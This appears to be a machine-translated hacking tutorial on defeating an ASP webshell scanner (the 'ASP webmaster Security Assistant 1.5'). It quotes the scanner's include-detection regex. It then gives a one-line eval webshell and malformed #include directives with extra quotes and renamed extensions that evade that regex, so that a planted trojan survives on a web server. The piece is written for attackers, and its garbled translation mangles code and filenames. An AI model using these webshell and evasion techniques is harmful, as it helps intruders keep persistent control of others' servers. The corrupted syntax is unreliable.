Lake2 used the last time in the evil eight contest, and even tore up his own anti-DDoS pro's ultimate anti-virus ASP Trojan and his leeching diagram ASP webmaster's Security Assistant, in the end, of course, I won the game. The result is of course an ASP Trojan of lake2. However, after lake2's release of leike graph ASP webmaster's security assistant version 1.5, even the horse was sacrificed with honor.
The old one does not go, and the new one does not come. The article "Study on ASP Trojan-free killing" tells us that we are using "S .. /"folder and create Haha in Windows 2003. ASP folder, to successfully restore the ocean, we use the copy method to place the image in the ASP Trojan header. Are they not perfect.
The last time the anti-DDoS Pro was designed, the ASP trojan was also killed, and the use of a single-statement trojan was not perfect. today, I will try again to break through the security assistant of leike graph ASP webmaster and create ASP Trojans that are easier to use.
The lake2 website has the source code of 1.5, and found that this version has indeed improved a lot, and added the detection and removal function:
1: scan and kill ASP Trojans that have passed unicode encoding
2: Check and kill files using the (Open | create) textfile, savetofile, save, set server, server. (Transfer | execute), ShellExecute, exec, run Method
3: changed the method of opening the file in opentextfile in Fso method. Now it is opened in open mode in method using ADODB. Stream.
After these three functions are added to the program, the trojan detection and removal capabilities are greatly enhanced. It is difficult to break through the past! No wonder, lake2 said on its website that it could kill almost all ASP Trojans. Today we will look at how to break through it.
When I read the webmaster assistant code this time, I noticed the following problem: this ASP webmaster Security Assistant uses a large number of regular expressions. My personal opinion on regular expressions is: if the matching is good, it is not easy to make a breakthrough. But if the matching is not good, we can easily make a breakthrough. A powerful system will become insecure. before breaking through it, let's take a look at the basic syntax of regular expressions.
* Matches the previous subexpression zero or multiple times. For example, Zo * can match "Z" and "Zoo ". * Is equivalent to {0 ,}.
/S matches any blank characters, including spaces, tabs, and page breaks. It is equivalent to [/f/n/R/T/V].
. Match any single character except linefeed/n. To match., use /.
If we use the combination of "/s" and "*" as "/S *", 0 or multiple spaces, tabs, and page breaks will be matched. if we use ". "and" * "are combined ". * "will match 0 or more characters except line breaks. with this knowledge, let's look at its code.
The following code is available in admin_scanwebshell.asp:
'Check include file"
Set RegEx = new Regexp // create a regular expression object
RegEx. ignorecase = true // case insensitive
RegEx. Global = true // set to global match
RegEx. pattern = "<! --/S * # include/S * file/S * =/S * ". *" // Mode
Set matches = RegEx. execute (filetxt) // run the search in the string filetxt in regular expression mode, and return an array containing the search result. If the exec method does not find a match, it returns NULL.
For each match in matches
Tfile = Replace (mid (match. value, instr (match. value, "") + 1, Len (match. value)-instr (match. value, ")-1),"/","/") // search and replace
If not checkext (FSOs. getextensionname (tfile) Then // if it belongs to the suffix to be checked, perform the next scan.
Call scanfile (mid (filepath, 1, faster Rev (filepath, "/") & tfile, replace (filepath, server. mappath ("/") & "/", "", 1) // call the file for killing
Sumfiles = sumfiles + 1
End if
(Note: use almost the same function in another file, but replace the double quotation marks of the above function with single quotation marks)
Next, let's analyze the execution process of this program. Here, if we use "<! -- # Include file = "1.txt" -->". The program adopts the set Regular Expression Pattern RegEx. pattern = "<! --/S * # include/S * file/S * =/S *". * "" search in filetxt and return an array containing the search result, because our string: <! -- # Include file = "1.txt" --> it is consistent with the Set regular expression mode. Therefore, an array containing the search result is returned. then perform the search, replace, and scan and kill operations. If we can construct a string that does not conform to this mode, null will be returned, and our ASP horse will not be killed, the following is an experiment:
Step 1:
1: Create a new file ttfct.txt with the following content: <% eval request ("go") %>.
2: Create a new file named nokill. asp with the content of <! -- # Include file1_ttfct.txt "-->
Use leike graph ASP webmaster Security Assistant 1.5 for query. The connection with the client of lake2 is normal.
Step 2:
Modify nokill. asp to <! -- # Include file = "ttfct. T" SS "XT" -->, connect again. I don't know if you noticed this sentence: Active Server Pages, ASP 0126 (0x80004005), cannot find the file containing 'ttfct. t '. /Ttfct/nokill. asp, row 1st
Why do we only have ttfct. t here? Indeed, XT has been taken because it has been truncated. Then, we can add XT and change its content to: <! -- # Include filebench into ttfct.txt "SS" XT "--> submit again. The result is successfully submitted. The result is displayed in the same way as Figure 2. Use the statement we constructed now: <! -- # Include file1_ttfct.txt "SS" XT "--> and RegEx. pattern =" <! --/S * # include/S * file/S * =/S *". * "", we found that no, our statement has four quotation marks, and this matching statement only has two quotation marks, of course, the match will not succeed. the following results show my analysis.
"Include file =" can be followed by a string, so the two sides can not be added. Therefore, we change the content to "ttfct" <! -- # Include file = "ttfct.txt" --> "You can also successfully connect to and break through the Security Assistant of the ASP webmaster of leike graph. Then, we construct: <! -- # Include file1_ttfct.txt --> (Note: ttfct.txt has no quotation marks on both sides). This way, we can successfully make our Trojan Horse survive for a long time.
In a word, the trojan starts to recover. In the same way, we can prevent the marine ASP trojan from being scanned and killed. The specific method is to change the suffix of the Marine ASP Trojan. DLL ,. hack and so on. You can use it as you like and change it to your name :).
Then we create a new file named Hy. asp, and run the Code <! -- # Include file = "Hy. dll" stssst "--> put it in and access Hy. asp to call Ocean.
Conclusion: In addition to understanding ASP, we also need to use practice to realize success.
If you have a better way to do this, please feel free to contact me. My ID is ttfct. |
